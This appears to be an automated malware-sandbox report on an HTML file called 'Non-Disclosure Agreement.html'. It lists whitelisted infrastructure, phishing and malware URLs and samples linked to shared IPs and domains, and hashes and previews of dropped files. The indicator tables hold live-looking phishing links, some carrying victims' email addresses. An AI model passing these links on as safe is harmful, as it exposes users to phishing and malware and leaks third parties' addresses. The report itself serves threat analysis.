                                                                      • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.164.84, 172.217.17.46, 172.217.19.170, 172.217.19.234, 172.217.19.202, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.42, 172.217.19.10, 172.217.21.42, 172.217.17.74, 192.229.221.95, 199.232.210.172, 20.76.201.171, 20.112.250.133, 20.236.44.162, 20.231.239.246, 20.70.246.20, 184.30.21.171, 152.199.19.160, 104.102.41.166, 184.24.77.150, 184.24.77.136, 184.24.77.143, 184.24.77.137, 23.218.209.163, 172.217.17.35, 172.217.19.206, 13.107.246.63, 23.218.208.109, 92.122.16.236, 4.245.163.56
                                                                      • Excluded domains from analysis (whitelisted): assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, sharepoint.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1778.g2.akamai.net, optimizationguide-pa.googleapis.com, e10583.dspg.akamaiedge.net, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.akamaized.net, assets.onestore.ms.akadns.net, fe3cr.delivery.mp.microsoft.com, c-s.cms.ms.akadns.net, edgedl.me.gvt1.com, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, clients.l.google.com, az725175.vo.msecnd.net, www.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: Non-Disclosure Agreement.html
                                                                      No simulations
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      172.67.155.68CONTRACT SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                      • www.500truyen.com/s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL
                                                                      172.67.181.220EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                        https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=Get hashmaliciousUnknownBrowse
                                                                          104.18.94.41https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                    https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                      https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                        A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                          DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                              151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-3.3.1.min.js
                                                                                              http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.7.min.js
                                                                                              http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.7.2.min.js
                                                                                              http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-3.3.1.min.js
                                                                                              2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-latest.min.js
                                                                                              151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.11.3.min.js
                                                                                              http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.11.3.min.js
                                                                                              http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.7.min.js
                                                                                              https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-3.3.1.min.js
                                                                                              http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                              • code.jquery.com/jquery-1.7.2.min.js
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              cdnjs.cloudflare.comhttps://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.24.14
                                                                                              https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.24.14
                                                                                              NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              https://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.24.14
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.24.14
                                                                                              vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              challenges.cloudflare.comhttps://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.95.41
                                                                                              https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.95.41
                                                                                              NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.94.41
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.94.41
                                                                                              https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                              • 104.18.94.41
                                                                                              https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.95.41
                                                                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.94.41
                                                                                              alternative-magic.comPortfolio Review _2024.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 69.49.245.172
                                                                                              code.jquery.comhttps://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.2.137
                                                                                              https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.130.137
                                                                                              NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.194.137
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 151.101.2.137
                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                              • 151.101.66.137
                                                                                              vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.130.137
                                                                                              https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                              • 151.101.194.137
                                                                                              https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                              • 151.101.2.137
                                                                                              https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.66.137
                                                                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.66.137
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSrs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.93.157
                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 172.67.179.109
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              FASTLYUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 185.199.109.133
                                                                                              RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.2.137
                                                                                              https:/u8138501.ct.sendgrid.net/ls/click?upn=u001.I6qT8Dz69MhteW3705K6IU1LQ3g963Y3zRTsxDX4fVXYJ9RlDTttUZ-2F4W6jkAN-2BWeLmhXvVM33dZ8zdyDBxMHQ-3D-3D9QvK_A3EA-2BxZf4c3dsLaDejTByFLk41BCxE4Uo2OrX4mgE2MxlzcgK-2B0xybGuUTGyYJ5YjbiPC-2BiCJh5GAJwBubqkrvcCxWB69FtxO-2BVNGA0rN43JH8wByhnP3sbd4cxwRxIrAIlntQArpxTPdsHXXK7UbcIv5pqpXW-2FKGrctJVKLD8TvnmRv0E5Rim-2FIGs5oxbnurWR3Goko7UqMeLf2edTdmQ-3D-3DGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.128.217
                                                                                              https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msiGet hashmaliciousUnknownBrowse
                                                                                              • 185.199.108.133
                                                                                              https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.130.137
                                                                                              NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.194.137
                                                                                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 167.82.232.118
                                                                                              https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.129.229
                                                                                              main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                              • 185.199.111.153
                                                                                              CLOUDFLARENETUSrs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.93.157
                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 172.67.179.109
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.211.185
                                                                                              hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 172.65.251.78
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ers.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 20.198.118.190
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 20.198.118.190
                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 20.198.118.190
                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 20.198.118.190
                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 20.198.118.190
                                                                                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 20.198.118.190
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 20.198.118.190
                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 20.198.118.190
                                                                                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 20.198.118.190
                                                                                              hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                              • 20.198.118.190
                                                                                              No context
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                              Category:dropped
                                                                                              Size (bytes):89501
                                                                                              Entropy (8bit):5.289893677458563
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):513
                                                                                              Entropy (8bit):5.350826451115093
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (1373), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2014
                                                                                              Entropy (8bit):5.980237976097718
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:VIJ7bbvo43x8KOUQeJlZTPwgNogeQfCBPy43niR6kauIlFzPF4t:VIJzvojVUQetTHWhy43nitauIlFLF4t
                                                                                              MD5:5A287EBB5E0FA78D6C5A03CB5AB7BADF
                                                                                              SHA1:934BA64B0DB9863BCBCE301A1097856CAFE96778
                                                                                              SHA-256:D6F4FBF638B611D340F0E1A6C0A2526C562B0D2227F05BA68EBBDCCF741B9E30
                                                                                              SHA-512:DB2EF3EADE6D979C18071D264C4F18405237D75E9D324471E1317AF32E840D5D55D42DB9A07FD806342CD95CD5125636021F174ECFA60C987817EAAC5C2FECBF
                                                                                              Malicious:false
                                                                                              Reputation:low
